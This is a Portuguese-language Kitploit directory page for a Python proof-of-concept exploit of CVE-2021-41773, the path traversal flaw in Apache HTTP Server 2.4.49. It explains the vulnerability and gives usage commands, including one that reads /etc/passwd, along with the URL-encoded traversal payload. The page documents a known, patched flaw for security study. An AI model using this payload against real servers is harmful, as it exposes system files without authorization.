Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-CVE-2021-41773 — Exploit em Python para CVE-2021-41773 - vulnerabilidade de Path Traversal no Apache HTTP Server 2.4.49 | Kitploit
Ferramentas/GitHubGitHub/blu3ming/poc-cve-2021-41773
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubblu3ming/poc-cve-2021-41773

PoC-CVE-2021-41773

Exploit em Python para CVE-2021-41773 - vulnerabilidade de Path Traversal no Apache HTTP Server 2.4.49

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-41773 Exploit de Path Traversal no Apache HTTP Server

Um exploit em Python para CVE-2021-41773, uma vulnerabilidade de path traversal no Apache HTTP Server 2.4.49 que permite ler arquivos arbitrários do servidor.

Detalhes da Vulnerabilidade

CVE-2021-41773 é uma vulnerabilidade de path traversal no Apache HTTP Server 2.4.49 que ocorre devido à validação inadequada de caminhos fornecidos pelo usuário. A vulnerabilidade permite que atacantes leiam arquivos fora do document root usando sequências de path traversal codificadas em URL.

  • Pontuação CVSS: 7.5 (Alta)
  • Versões Afetadas: Apache HTTP Server 2.4.49
  • Vetor: Remoto, não autenticado

Instalação

root@kitploit:~
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt

Uso

root@kitploit:~
python3 cve-2021-41773.py -t <target> -f <file_path>

Parâmetros

  • -t, --target: URL do alvo (inclua protocolo e porta se necessário)
  • -f, --file: Caminho do arquivo a ser lido do servidor

Exemplo

root@kitploit:~
# Read /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

Exploit bem-sucedido

Como Funciona

O exploit usa sequências de path traversal codificadas em URL (.%2e/%2e%2e/) para contornar a validação de caminho do Apache:

  1. A versão vulnerável do Apache falha ao decodificar e validar corretamente o caminho
  2. Pontos codificados em URL (.%2e) contornam as verificações de segurança iniciais
  3. O servidor processa o path traversal após a decodificação, permitindo o acesso a arquivos

O segredo é usar urllib3.PoolManager() em vez de requests.get() para evitar a normalização automática de URL que quebraria o exploit.

Detalhes Técnicos

root@kitploit:~
# The exploit URL structure:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{target_file}

Isso se traduz em:

root@kitploit:~
/cgi-bin/../../../../{target_file}

Referências

  • CVE-2021-41773 - MITRE
  • Apache HTTP Server Security Advisory
  • NVD - CVE-2021-41773
Baixar ferramenta